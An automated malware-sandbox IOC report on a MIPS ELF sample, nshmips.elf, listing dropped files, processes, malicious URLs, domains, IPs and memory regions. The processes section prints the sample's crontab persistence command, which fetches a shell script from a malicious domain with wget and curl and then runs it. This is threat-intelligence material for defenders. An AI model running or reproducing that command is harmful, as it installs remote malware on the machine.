IOC Report
nshmips.elf

loading gif

Files

File Path
Type
Category
Malicious
nshmips.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.1RidhP
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/nshmips.elf
/tmp/nshmips.elf
/tmp/nshmips.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/nshmips.elf
-
/tmp/nshmips.elf
-
/tmp/nshmips.elf
-
/tmp/nshmips.elf
-
/tmp/nshmips.elf
-
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
193.233.193.45

IPs

IP
Domain
Country
Malicious
185.82.200.181
unknown
Netherlands
194.87.198.29
unknown
Russian Federation
51.89.127.38
unknown
France
109.202.202.202
unknown
Switzerland
91.149.218.232
unknown
Poland
88.151.195.22
unknown
Azerbaijan
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7efe83ce8000
page read and write
7efe83e5e000
page read and write
7efe837d6000
page read and write
7efe83e19000
page read and write
7efe83145000
page read and write
55e1e63bb000
page execute and read and write
55e1e63d2000
page read and write
55e1e63bb000
page execute and read and write
7efe7c000000
page read and write
7efdfc459000
page read and write
7efe83e11000
page read and write
7efe83796000
page read and write
7efdfc459000
page read and write
7efe83e19000
page read and write
7efe83e11000
page read and write
7ffd6f2c3000
page read and write
55e1e43bd000
page read and write
55e1e73c1000
page read and write
7efe7c000000
page read and write
7efe833f5000
page read and write
7efe83ce8000
page read and write
7efe83e5e000
page read and write
7efdfc459000
page read and write
7efdfc418000
page execute read
55e1e412b000
page execute read
7efe83137000
page read and write
7ffd6f395000
page execute read
7efe833f5000
page read and write
7efdfc418000
page execute read
55e1e73c1000
page read and write
7efdfc45f000
page read and write
55e1e43b3000
page read and write
55e1e43bd000
page read and write
7efe837b9000
page read and write
55e1e43bd000
page read and write
7efe83137000
page read and write
7efe83137000
page read and write
7ffd6f2c3000
page read and write
7efe837b9000
page read and write
7efe7c000000
page read and write
55e1e63d2000
page read and write
7efe7c000000
page read and write
7efe8292f000
page read and write
7efe8292f000
page read and write
7efe83145000
page read and write
7efe8292f000
page read and write
7efe83137000
page read and write
7efe833f5000
page read and write
55e1e412b000
page execute read
55e1e63d2000
page read and write
7efe83e11000
page read and write
7ffd6f395000
page execute read
7efe833f5000
page read and write
7efe83145000
page read and write
7efe7c021000
page read and write
55e1e73c1000
page read and write
7ffd6f395000
page execute read
7efe8292f000
page read and write
55e1e43b3000
page read and write
7efe83796000
page read and write
7efe83e11000
page read and write
7efe83e5e000
page read and write
7efe837d6000
page read and write
55e1e43bd000
page read and write
7efe837d6000
page read and write
7efe83ce8000
page read and write
7efe83796000
page read and write
7efdfc418000
page execute read
7efe83b07000
page read and write
7efdfc459000
page read and write
7efdfc418000
page execute read
7efe83e19000
page read and write
7efe837b9000
page read and write
7efdfc45f000
page read and write
7efe83796000
page read and write
7efe7c021000
page read and write
7efe7c021000
page read and write
7efe83e5e000
page read and write
7ffd6f2c3000
page read and write
7efe83b07000
page read and write
7efe83b07000
page read and write
7ffd6f395000
page execute read
7efdfc45f000
page read and write
7efe83e19000
page read and write
55e1e63d2000
page read and write
55e1e63bb000
page execute and read and write
7efe83145000
page read and write
55e1e43b3000
page read and write
55e1e412b000
page execute read
7efe837b9000
page read and write
55e1e73c1000
page read and write
7efdfc45f000
page read and write
7efe7c021000
page read and write
7efe83b07000
page read and write
55e1e412b000
page execute read
7efe83ce8000
page read and write
7efe837d6000
page read and write
7ffd6f2c3000
page read and write
55e1e43b3000
page read and write
55e1e63bb000
page execute and read and write
There are 90 hidden memdumps, click here to show them.